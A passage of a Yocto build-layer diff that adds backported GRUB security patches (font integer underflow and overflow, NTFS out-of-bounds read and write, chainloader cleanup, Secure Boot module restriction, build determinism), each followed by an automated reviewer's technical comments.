+ for (cur = preboots_tail; cur; cur = cur->prev)
+ if (! err)
+diff --git a/grub-core/loader/efi/chainloader.c b/grub-core/loader/efi/chainloader.c
+index a8d7b91..93a028a 100644
+--- a/grub-core/loader/efi/chainloader.c
++++ b/grub-core/loader/efi/chainloader.c
+@@ -44,33 +44,28 @@ GRUB_MOD_LICENSE ("GPLv3+");
+
+ static grub_dl_t my_mod;
+
+-static grub_efi_physical_address_t address;
+-static grub_efi_uintn_t pages;
+-static grub_efi_device_path_t *file_path;
+-static grub_efi_handle_t image_handle;
+-static grub_efi_char16_t *cmdline;
+-
+ static grub_err_t
+-grub_chainloader_unload (void)
++grub_chainloader_unload (void *context)
+ {
++ grub_efi_handle_t image_handle = (grub_efi_handle_t) context;
++ grub_efi_loaded_image_t *loaded_image;
+ grub_efi_boot_services_t *b;
+
++ loaded_image = grub_efi_get_loaded_image (image_handle);
++ if (loaded_image != NULL)
++ grub_free (loaded_image->load_options);
++
+ b = grub_efi_system_table->boot_services;
+ efi_call_1 (b->unload_image, image_handle);
+- efi_call_2 (b->free_pages, address, pages);
+-
+- grub_free (file_path);
+- grub_free (cmdline);
+- cmdline = 0;
+- file_path = 0;
+
+ grub_dl_unref (my_mod);
+ return GRUB_ERR_NONE;
+ }
+
+ static grub_err_t
+-grub_chainloader_boot (void)
++grub_chainloader_boot (void *context)
+ {
++ grub_efi_handle_t image_handle = (grub_efi_handle_t) context;
+ grub_efi_boot_services_t *b;
+ grub_efi_status_t status;
+ grub_efi_uintn_t exit_data_size;
+@@ -139,7 +134,7 @@ make_file_path (grub_efi_device_path_t *dp, const char *filename)
+ char *dir_start;
+ char *dir_end;
+ grub_size_t size;
+- grub_efi_device_path_t *d;
++ grub_efi_device_path_t *d, *file_path;
+
+ dir_start = grub_strchr (filename, ')');
+ if (! dir_start)
+@@ -215,11 +210,15 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+ grub_efi_status_t status;
+ grub_efi_boot_services_t *b;
+ grub_device_t dev = 0;
+- grub_efi_device_path_t *dp = 0;
++ grub_efi_device_path_t *dp = NULL, *file_path = NULL;
+ grub_efi_loaded_image_t *loaded_image;
+ char *filename;
+ void *boot_image = 0;
+ grub_efi_handle_t dev_handle = 0;
++ grub_efi_physical_address_t address = 0;
++ grub_efi_uintn_t pages = 0;
++ grub_efi_char16_t *cmdline = NULL;
++ grub_efi_handle_t image_handle = NULL;
+
+ if (argc == 0)
+ return grub_error (GRUB_ERR_BAD_ARGUMENT, N_("filename expected"));
+@@ -227,11 +226,6 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+
+ grub_dl_ref (my_mod);
+
+- /* Initialize some global variables. */
+- address = 0;
+- image_handle = 0;
+- file_path = 0;
+-
+ b = grub_efi_system_table->boot_services;
+
+ file = grub_file_open (filename, GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE);
+@@ -401,7 +395,11 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+ grub_file_close (file);
+ grub_device_close (dev);
+
+- grub_loader_set (grub_chainloader_boot, grub_chainloader_unload, 0);
++ /* We're finished with the source image buffer and file path now. */
++ efi_call_2 (b->free_pages, address, pages);
++ grub_free (file_path);
++
++ grub_loader_set_ex (grub_chainloader_boot, grub_chainloader_unload, image_handle, 0);
+ return 0;
+
+ fail:
+@@ -412,11 +410,15 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+ if (file)
+ grub_file_close (file);
+
++ grub_free (cmdline);
+ grub_free (file_path);
+
+ if (address)
+ efi_call_2 (b->free_pages, address, pages);
+
++ if (image_handle != NULL)
++ efi_call_1 (b->unload_image, image_handle);
++
+ grub_dl_unref (my_mod);
+
+ return grub_errno;
+diff --git a/include/grub/loader.h b/include/grub/loader.h
+index 7f82a49..3071a50 100644
+--- a/include/grub/loader.h
++++ b/include/grub/loader.h
+@@ -39,6 +39,11 @@ void EXPORT_FUNC (grub_loader_set) (grub_err_t (*boot) (void),
+ grub_err_t (*unload) (void),
+ int flags);
+
++void EXPORT_FUNC (grub_loader_set_ex) (grub_err_t (*boot) (void *context),
++ grub_err_t (*unload) (void *context),
++ void *context,
++ int flags);
++
+ /* Unset current loader, if any. */
+ void EXPORT_FUNC (grub_loader_unset) (void);
+
+--
+2.25.1
+
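Review bot: `grub_simple_unload_hook()` calls `hooks->unload ()` unconditionally, so a loader registered through `grub_loader_set()` with a NULL `unload` would now be called through a null pointer, where the old code skipped it via the `grub_loader_unload_func` test. For simple loaders `grub_loader_unload_func` is now always the non-NULL wrapper, so the existing guard in `grub_loader_set_ex()` and `grub_loader_unset()` no longer covers that case. Whether any caller passes NULL is not visible in this patch; if one can, the wrapper should keep the old tolerance with `ret = hooks->unload ? hooks->unload () : GRUB_ERR_NONE;`. The same question applies to `hooks->boot ()` in `grub_simple_boot_hook()`.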
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-3775.patch b/meta/recipes-bsp/grub/files/CVE-2022-3775.patch
new file mode 100644
index 0000000000..e2e3f35584
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-3775.patch
@@ -0,0 +1,97 @@
+From fdbe7209152ad6f09a1166f64f162017f2145ba3 Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Mon, 24 Oct 2022 08:05:35 +0800
+Subject: [PATCH] font: Fix an integer underflow in blit_comb()
+
+The expression (ctx.bounds.height - combining_glyphs[i]->height) / 2 may
+evaluate to a very big invalid value even if both ctx.bounds.height and
+combining_glyphs[i]->height are small integers. For example, if
+ctx.bounds.height is 10 and combining_glyphs[i]->height is 12, this
+expression evaluates to 2147483647 (expected -1). This is because
+coordinates are allowed to be negative but ctx.bounds.height is an
+unsigned int. So, the subtraction operates on unsigned ints and
+underflows to a very big value. The division makes things even worse.
+The quotient is still an invalid value even if converted back to int.
+
+This patch fixes the problem by casting ctx.bounds.height to int. As
+a result the subtraction will operate on int and grub_uint16_t which
+will be promoted to an int. So, the underflow will no longer happen. Other
+uses of ctx.bounds.height (and ctx.bounds.width) are also casted to int,
+to ensure coordinates are always calculated on signed integers.
+
+Fixes: CVE-2022-3775
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=992c06191babc1e109caf40d6a07ec6fdef427af]
+CVE: CVE-2022-3775
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c | 16 ++++++++--------
+ 1 file changed, 8 insertions(+), 8 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index f110db9..3b76b22 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -1200,12 +1200,12 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ ctx.bounds.height = main_glyph->height;
+
+ above_rightx = main_glyph->offset_x + main_glyph->width;
+- above_righty = ctx.bounds.y + ctx.bounds.height;
++ above_righty = ctx.bounds.y + (int) ctx.bounds.height;
+
+ above_leftx = main_glyph->offset_x;
+- above_lefty = ctx.bounds.y + ctx.bounds.height;
++ above_lefty = ctx.bounds.y + (int) ctx.bounds.height;
+
+- below_rightx = ctx.bounds.x + ctx.bounds.width;
++ below_rightx = ctx.bounds.x + (int) ctx.bounds.width;
+ below_righty = ctx.bounds.y;
+
+ comb = grub_unicode_get_comb (glyph_id);
+@@ -1218,7 +1218,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+
+ if (!combining_glyphs[i])
+ continue;
+- targetx = (ctx.bounds.width - combining_glyphs[i]->width) / 2 + ctx.bounds.x;
++ targetx = ((int) ctx.bounds.width - combining_glyphs[i]->width) / 2 + ctx.bounds.x;
+ /* CGJ is to avoid diacritics reordering. */
+ if (comb[i].code
+ == GRUB_UNICODE_COMBINING_GRAPHEME_JOINER)
+@@ -1228,8 +1228,8 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ case GRUB_UNICODE_COMB_OVERLAY:
+ do_blit (combining_glyphs[i],
+ targetx,
+- (ctx.bounds.height - combining_glyphs[i]->height) / 2
+- - (ctx.bounds.height + ctx.bounds.y), &ctx);
++ ((int) ctx.bounds.height - combining_glyphs[i]->height) / 2
++ - ((int) ctx.bounds.height + ctx.bounds.y), &ctx);
+ if (min_devwidth < combining_glyphs[i]->width)
+ min_devwidth = combining_glyphs[i]->width;
+ break;
+@@ -1302,7 +1302,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ /* Fallthrough. */
+ case GRUB_UNICODE_STACK_ATTACHED_ABOVE:
+ do_blit (combining_glyphs[i], targetx,
+- -(ctx.bounds.height + ctx.bounds.y + space
++ -((int) ctx.bounds.height + ctx.bounds.y + space
+ + combining_glyphs[i]->height), &ctx);
+ if (min_devwidth < combining_glyphs[i]->width)
+ min_devwidth = combining_glyphs[i]->width;
+@@ -1310,7 +1310,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+
+ case GRUB_UNICODE_COMB_HEBREW_DAGESH:
+ do_blit (combining_glyphs[i], targetx,
+- -(ctx.bounds.height / 2 + ctx.bounds.y
++ -((int) ctx.bounds.height / 2 + ctx.bounds.y
+ + combining_glyphs[i]->height / 2), &ctx);
+ if (min_devwidth < combining_glyphs[i]->width)
+ min_devwidth = combining_glyphs[i]->width;
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2023-4692.patch b/meta/recipes-bsp/grub/files/CVE-2023-4692.patch
new file mode 100644
index 0000000000..0e74870ebf
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2023-4692.patch
@@ -0,0 +1,97 @@
+From 43651027d24e62a7a463254165e1e46e42aecdea Mon Sep 17 00:00:00 2001
+From: Maxim Suhanov <dfirblog@gmail.com>
+Date: Mon, 28 Aug 2023 16:31:57 +0300
+Subject: [PATCH] fs/ntfs: Fix an OOB write when parsing the $ATTRIBUTE_LIST
+ attribute for the $MFT file
+
+When parsing an extremely fragmented $MFT file, i.e., the file described
+using the $ATTRIBUTE_LIST attribute, current NTFS code will reuse a buffer
+containing bytes read from the underlying drive to store sector numbers,
+which are consumed later to read data from these sectors into another buffer.
+
+These sectors numbers, two 32-bit integers, are always stored at predefined
+offsets, 0x10 and 0x14, relative to first byte of the selected entry within
+the $ATTRIBUTE_LIST attribute. Usually, this won't cause any problem.
+
+However, when parsing a specially-crafted file system image, this may cause
+the NTFS code to write these integers beyond the buffer boundary, likely
+causing the GRUB memory allocator to misbehave or fail. These integers contain
+values which are controlled by on-disk structures of the NTFS file system.
+
+Such modification and resulting misbehavior may touch a memory range not
+assigned to the GRUB and owned by firmware or another EFI application/driver.
+
+This fix introduces checks to ensure that these sector numbers are never
+written beyond the boundary.
+
+Fixes: CVE-2023-4692
+
+Reported-by: Maxim Suhanov <dfirblog@gmail.com>
+Signed-off-by: Maxim Suhanov <dfirblog@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=43651027d24e62a7a463254165e1e46e42aecdea]
+CVE: CVE-2023-4692
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/fs/ntfs.c | 18 +++++++++++++++++-
+ 1 file changed, 17 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c
+index 2f34f76..c8d3683 100644
+--- a/grub-core/fs/ntfs.c
++++ b/grub-core/fs/ntfs.c
+@@ -184,7 +184,7 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ }
+ if (at->attr_end)
+ {
+- grub_uint8_t *pa;
++ grub_uint8_t *pa, *pa_end;
+
+ at->emft_buf = grub_malloc (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR);
+ if (at->emft_buf == NULL)
+@@ -209,11 +209,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ }
+ at->attr_nxt = at->edat_buf;
+ at->attr_end = at->edat_buf + u32at (pa, 0x30);
++ pa_end = at->edat_buf + n;
+ }
+ else
+ {
+ at->attr_nxt = at->attr_end + u16at (pa, 0x14);
+ at->attr_end = at->attr_end + u32at (pa, 4);
++ pa_end = at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR);
+ }
+ at->flags |= GRUB_NTFS_AF_ALST;
+ while (at->attr_nxt < at->attr_end)
+@@ -230,6 +232,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ at->flags |= GRUB_NTFS_AF_GPOS;
+ at->attr_cur = at->attr_nxt;
+ pa = at->attr_cur;
++
++ if ((pa >= pa_end) || (pa_end - pa < 0x18))
++ {
++ grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list");
++ return NULL;
++ }
++
+ grub_set_unaligned32 ((char *) pa + 0x10,
+ grub_cpu_to_le32 (at->mft->data->mft_start));
+ grub_set_unaligned32 ((char *) pa + 0x14,
+@@ -240,6 +249,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ {
+ if (*pa != attr)
+ break;
++
++ if ((pa >= pa_end) || (pa_end - pa < 0x18))
++ {
++ grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list");
++ return NULL;
++ }
++
+ if (read_attr
+ (at, pa + 0x10,
+ u32at (pa, 0x10) * (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR),
+--
+2.25.1
+
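Review bot: In the second added check in `find_attr()`, `if (*pa != attr)` still reads the byte at `pa` before `pa` is compared with `pa_end`, so that read is not covered by the new bound. The loop head is outside the hunk and may already limit `pa` by `at->attr_end`, but `at->attr_end` is computed a few lines up from on-disk fields (`u32at (pa, 0x30)`, `u32at (pa, 4)`), so it is not a trustworthy limit on its own. At least the `pa >= pa_end` half of the test belongs before the dereference, for example `if (pa >= pa_end || *pa != attr) break;`, with the `pa_end - pa < 0x18` check kept where it is. As a style point, the `\'` in `"can\'t parse attribute list"` is an unnecessary escape.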
diff --git a/meta/recipes-bsp/grub/files/CVE-2023-4693.patch b/meta/recipes-bsp/grub/files/CVE-2023-4693.patch
new file mode 100644
index 0000000000..1e6b6efdec
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2023-4693.patch
@@ -0,0 +1,62 @@
+From 0ed2458cc4eff6d9a9199527e2a0b6d445802f94 Mon Sep 17 00:00:00 2001
+From: Maxim Suhanov <dfirblog@gmail.com>
+Date: Mon, 28 Aug 2023 16:32:33 +0300
+Subject: [PATCH] fs/ntfs: Fix an OOB read when reading data from the resident
+ $DATA attribute
+
+When reading a file containing resident data, i.e., the file data is stored in
+the $DATA attribute within the NTFS file record, not in external clusters,
+there are no checks that this resident data actually fits the corresponding
+file record segment.
+
+When parsing a specially-crafted file system image, the current NTFS code will
+read the file data from an arbitrary, attacker-chosen memory offset and of
+arbitrary, attacker-chosen length.
+
+This allows an attacker to display arbitrary chunks of memory, which could
+contain sensitive information like password hashes or even plain-text,
+obfuscated passwords from BS EFI variables.
+
+This fix implements a check to ensure that resident data is read from the
+corresponding file record segment only.
+
+Fixes: CVE-2023-4693
+
+Reported-by: Maxim Suhanov <dfirblog@gmail.com>
+Signed-off-by: Maxim Suhanov <dfirblog@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=0ed2458cc4eff6d9a9199527e2a0b6d445802f94]
+CVE: CVE-2023-4693
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/fs/ntfs.c | 13 ++++++++++++-
+ 1 file changed, 12 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c
+index c8d3683..4d1fe42 100644
+--- a/grub-core/fs/ntfs.c
++++ b/grub-core/fs/ntfs.c
+@@ -401,7 +401,18 @@ read_data (struct grub_ntfs_attr *at, grub_uint8_t *pa, grub_uint8_t *dest,
+ {
+ if (ofs + len > u32at (pa, 0x10))
+ return grub_error (GRUB_ERR_BAD_FS, "read out of range");
+- grub_memcpy (dest, pa + u32at (pa, 0x14) + ofs, len);
++
++ if (u32at (pa, 0x10) > (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute too large");
++
++ if (pa >= at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range");
++
++ if (u16at (pa, 0x14) + u32at (pa, 0x10) >
++ (grub_addr_t) at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR) - (grub_addr_t) pa)
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range");
++
++ grub_memcpy (dest, pa + u16at (pa, 0x14) + ofs, len);
+ return 0;
+ }
+
+--
+2.25.1
+
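Review bot: The new range checks in `read_data()` bound `pa` only from above against `at->mft->buf`, and nothing in the hunk establishes that `pa` points into `at->mft->buf` at all. The CVE-2023-4692 patch in this series shows `find_attr()` also working in `at->emft_buf` and `at->edat_buf`. If a resident attribute can reach this branch from one of those buffers, the pointer comparison is between unrelated allocations and the `(grub_addr_t) at->mft->buf + ... - (grub_addr_t) pa` subtraction no longer describes the space left. I would confirm the callers and then either add the lower bound, `if (pa < at->mft->buf || pa >= at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))`, or state the assumption in a comment above the checks. The function body continues outside the hunk.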
diff --git a/meta/recipes-bsp/grub/files/determinism.patch b/meta/recipes-bsp/grub/files/determinism.patch
new file mode 100644
index 0000000000..bd4e7188ec
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/determinism.patch
@@ -0,0 +1,56 @@
+The output in moddep.lst generated from syminfo.lst using genmoddep.awk is
+not deterministic since the order of the dependencies on each line can vary
+depending on how awk sorts the values in the array.
+
+Be deterministic in the output by sorting the dependencies on each line.
+
+Also, the output of the SOURCES lines in grub-core/Makefile.core.am, generated
+from grub-core/Makefile.core.def with gentpl.py is not deterministic due to
+missing sorting of the list used to generate it. Add such a sort.
+
+Also ensure the generated unidata.c file is deterministic by sorting the
+keys of the dict.
+
+Upstream-Status: Submitted [https://lists.gnu.org/archive/html/grub-devel/2023-06/index.html]
+Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: grub-2.04/grub-core/genmoddep.awk
+===================================================================
+--- grub-2.04.orig/grub-core/genmoddep.awk
++++ grub-2.04/grub-core/genmoddep.awk
+@@ -59,7 +59,9 @@ END {
+ }
+ modlist = ""
+ depcount[mod] = 0
+- for (depmod in uniqmods) {
++ n = asorti(uniqmods, w)
++ for (i = 1; i <= n; i++) {
++ depmod = w[i]
+ modlist = modlist " " depmod;
+ inverse_dependencies[depmod] = inverse_dependencies[depmod] " " mod
+ depcount[mod]++
+Index: grub-2.04/gentpl.py
+===================================================================
+--- grub-2.04.orig/gentpl.py
++++ grub-2.04/gentpl.py
+@@ -568,6 +568,7 @@ def foreach_platform_value(defn, platfor
+ for group in RMAP[platform]:
+ for value in defn.find_all(group + suffix):
+ r.append(closure(value))
++ r.sort()
+ return ''.join(r)
+
+ def platform_conditional(platform, closure):
+Index: grub-2.04/util/import_unicode.py
+===================================================================
+--- grub-2.04.orig/util/import_unicode.py
++++ grub-2.04/util/import_unicode.py
+@@ -174,7 +174,7 @@ infile.close ()
+
+ outfile.write ("struct grub_unicode_arabic_shape grub_unicode_arabic_shapes[] = {\n ")
+
+-for x in arabicsubst:
++for x in sorted(arabicsubst):
+ try:
+ if arabicsubst[x]['join'] == "DUAL":
+ outfile.write ("{0x%x, 0x%x, 0x%x, 0x%x, 0x%x},\n " % (arabicsubst[x][0], arabicsubst[x][1], arabicsubst[x][2], arabicsubst[x][3], arabicsubst[x][4]))
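Review bot: `asorti()` in the genmoddep.awk change is a GNU awk extension, so generating moddep.lst now requires gawk, and a build host whose `awk` is another implementation would fail at this step. The patch does not say so anywhere. A comment beside the call, `# asorti() is gawk-only; this script must be run with gawk`, would make the requirement explicit, and the recipe should make sure gawk is the awk that runs it. The header also gives the author as a bare name and address without a `Signed-off-by:` tag.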
diff --git a/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch b/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch
new file mode 100644
index 0000000000..d4ba3cafc5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch
@@ -0,0 +1,117 @@
+From 1f511ae054fe42dce7aedfbfe0f234fa1e0a7a3e Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Fri, 5 Aug 2022 00:51:20 +0800
+Subject: [PATCH] font: Fix size overflow in grub_font_get_glyph_internal()
+
+The length of memory allocation and file read may overflow. This patch
+fixes the problem by using safemath macros.
+
+There is a lot of code repetition like "(x * y + 7) / 8". It is unsafe
+if overflow happens. This patch introduces grub_video_bitmap_calc_1bpp_bufsz().
+It is safe replacement for such code. It has safemath-like prototype.
+
+This patch also introduces grub_cast(value, pointer), it casts value to
+typeof(*pointer) then store the value to *pointer. It returns true when
+overflow occurs or false if there is no overflow. The semantics of arguments
+and return value are designed to be consistent with other safemath macros.
+
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c76ec09ae08155df27cd237eaea150b4f02f532]
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c | 17 +++++++++++++----
+ include/grub/bitmap.h | 18 ++++++++++++++++++
+ include/grub/safemath.h | 2 ++
+ 3 files changed, 33 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index 5edb477..df17dba 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -733,7 +733,8 @@ grub_font_get_glyph_internal (grub_font_t font, grub_uint32_t code)
+ grub_int16_t xoff;
+ grub_int16_t yoff;
+ grub_int16_t dwidth;
+- int len;
++ grub_ssize_t len;
++ grub_size_t sz;
+
+ if (index_entry->glyph)
+ /* Return cached glyph. */
+@@ -760,9 +761,17 @@ grub_font_get_glyph_internal (grub_font_t font, grub_uint32_t code)
+ return 0;
+ }
+
+- len = (width * height + 7) / 8;
+- glyph = grub_malloc (sizeof (struct grub_font_glyph) + len);
+- if (!glyph)
++ /* Calculate real struct size of current glyph. */
++ if (grub_video_bitmap_calc_1bpp_bufsz (width, height, &len) ||
++ grub_add (sizeof (struct grub_font_glyph), len, &sz))
++ {
++ remove_font (font);
++ return 0;
++ }
++
++ /* Allocate and initialize the glyph struct. */
++ glyph = grub_malloc (sz);
++ if (glyph == NULL)
+ {
+ remove_font (font);
+ return 0;
+diff --git a/include/grub/bitmap.h b/include/grub/bitmap.h
+index 5728f8c..0d9603f 100644
+--- a/include/grub/bitmap.h
++++ b/include/grub/bitmap.h
+@@ -23,6 +23,7 @@
+ #include <grub/symbol.h>
+ #include <grub/types.h>
+ #include <grub/video.h>
++#include <grub/safemath.h>
+
+ struct grub_video_bitmap
+ {
+@@ -79,6 +80,23 @@ grub_video_bitmap_get_height (struct grub_video_bitmap *bitmap)
+ return bitmap->mode_info.height;
+ }
+
++/*
++ * Calculate and store the size of data buffer of 1bit bitmap in result.
++ * Equivalent to "*result = (width * height + 7) / 8" if no overflow occurs.
++ * Return true when overflow occurs or false if there is no overflow.
++ * This function is intentionally implemented as a macro instead of
++ * an inline function. Although a bit awkward, it preserves data types for
++ * safemath macros and reduces macro side effects as much as possible.
++ *
++ * XXX: Will report false overflow if width * height > UINT64_MAX.
++ */
++#define grub_video_bitmap_calc_1bpp_bufsz(width, height, result) \
++({ \
++ grub_uint64_t _bitmap_pixels; \
++ grub_mul ((width), (height), &_bitmap_pixels) ? 1 : \
++ grub_cast (_bitmap_pixels / GRUB_CHAR_BIT + !!(_bitmap_pixels % GRUB_CHAR_BIT), (result)); \
++})
++
+ void EXPORT_FUNC (grub_video_bitmap_get_mode_info) (struct grub_video_bitmap *bitmap,
+ struct grub_video_mode_info *mode_info);
+
+diff --git a/include/grub/safemath.h b/include/grub/safemath.h
+index c17b89b..bb0f826 100644
+--- a/include/grub/safemath.h
++++ b/include/grub/safemath.h
+@@ -30,6 +30,8 @@
+ #define grub_sub(a, b, res) __builtin_sub_overflow(a, b, res)
+ #define grub_mul(a, b, res) __builtin_mul_overflow(a, b, res)
+
++#define grub_cast(a, res) grub_add ((a), 0, (res))
++
+ #else
+ #error gcc 5.1 or newer or clang 3.8 or newer is required
+ #endif
+--
+2.25.1
+
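Review bot: `grub_cast()` is added to include/grub/safemath.h with no comment, and its return convention is the reverse of what a cast-like name suggests. The commit message says it returns true when the value does not fit, but that explanation is not carried into the header. A caller who writes `if (grub_cast (v, &out))` expecting success would proceed on an overflowed size, so the contract should sit next to the macro: `/* Store a in *res. Returns true if a does not fit in typeof (*res), false otherwise. */`.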
diff --git a/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch b/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch
new file mode 100644
index 0000000000..504352b4e3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch
@@ -0,0 +1,107 @@
+From b5a6aa7d77439bfeb75f200abffe15c6f685c907 Mon Sep 17 00:00:00 2001
+From: Matthew Garrett <mjg@redhat.com>
+Date: Mon, 13 Jan 2014 12:13:09 +0000
+Subject: Don't permit loading modules on UEFI secure boot
+
+Author: Colin Watson <cjwatson@ubuntu.com>
+Origin: vendor, http://pkgs.fedoraproject.org/cgit/grub2.git/tree/grub-2.00-no-insmod-on-sb.patch
+Forwarded: no
+Last-Update: 2013-12-25
+
+Patch-Name: no-insmod-on-sb.patch
+
+Upstream-Status: Inappropriate [other, https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch]
+
+Backport of a Debian (and Fedora) patch implementing a way to get secure boot status
+for CVE-2020-14372_4.patch. The upstream solution has too many dependencies to backport.
+Source: https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch
+
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/dl.c | 13 +++++++++++++
+ grub-core/kern/efi/efi.c | 28 ++++++++++++++++++++++++++++
+ include/grub/efi/efi.h | 1 +
+ 3 files changed, 42 insertions(+)
+
+diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c
+index 48eb5e7b6..074dfc3c6 100644
+--- a/grub-core/kern/dl.c
++++ b/grub-core/kern/dl.c
+@@ -38,6 +38,10 @@
+ #define GRUB_MODULES_MACHINE_READONLY
+ #endif
+
++#ifdef GRUB_MACHINE_EFI
++#include <grub/efi/efi.h>
++#endif
++
+
+
+ #pragma GCC diagnostic ignored "-Wcast-align"
+@@ -686,6 +690,15 @@ grub_dl_load_file (const char *filename)
+ void *core = 0;
+ grub_dl_t mod = 0;
+
++#ifdef GRUB_MACHINE_EFI
++ if (grub_efi_secure_boot ())
++ {
++ grub_error (GRUB_ERR_ACCESS_DENIED,
++ "Secure Boot forbids loading module from %s", filename);
++ return 0;
++ }
++#endif
++
+ grub_boot_time ("Loading module %s", filename);
+
+ file = grub_file_open (filename, GRUB_FILE_TYPE_GRUB_MODULE);
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index 6e1ceb905..96204e39b 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -273,6 +273,34 @@ grub_efi_get_variable (const char *var, const grub_efi_guid_t *guid,
+ return NULL;
+ }
+
++grub_efi_boolean_t
++grub_efi_secure_boot (void)
++{
++ grub_efi_guid_t efi_var_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID;
++ grub_size_t datasize;
++ char *secure_boot = NULL;
++ char *setup_mode = NULL;
++ grub_efi_boolean_t ret = 0;
++
++ secure_boot = grub_efi_get_variable ("SecureBoot", &efi_var_guid, &datasize);
++
++ if (datasize != 1 || !secure_boot)
++ goto out;
++
++ setup_mode = grub_efi_get_variable ("SetupMode", &efi_var_guid, &datasize);
++
++ if (datasize != 1 || !setup_mode)
++ goto out;
++
++ if (*secure_boot && !*setup_mode)
++ ret = 1;
++
++ out:
++ grub_free (secure_boot);
++ grub_free (setup_mode);
++ return ret;
++}
++
+ #pragma GCC diagnostic ignored "-Wcast-align"
+
+ /* Search the mods section from the PE32/PE32+ image. This code uses
+diff --git a/include/grub/efi/efi.h b/include/grub/efi/efi.h
+index e90e00dc4..a237952b3 100644
+--- a/include/grub/efi/efi.h
++++ b/include/grub/efi/efi.h
+@@ -82,6 +82,7 @@ EXPORT_FUNC (grub_efi_set_variable) (const char *var,
+ const grub_efi_guid_t *guid,
+ void *data,
+ grub_size_t datasize);
++grub_efi_boolean_t EXPORT_FUNC (grub_efi_secure_boot) (void);
+ int
+ EXPORT_FUNC (grub_efi_compare_device_paths) (const grub_efi_device_path_t *dp1,
+ const grub_efi_device_path_t *dp2);
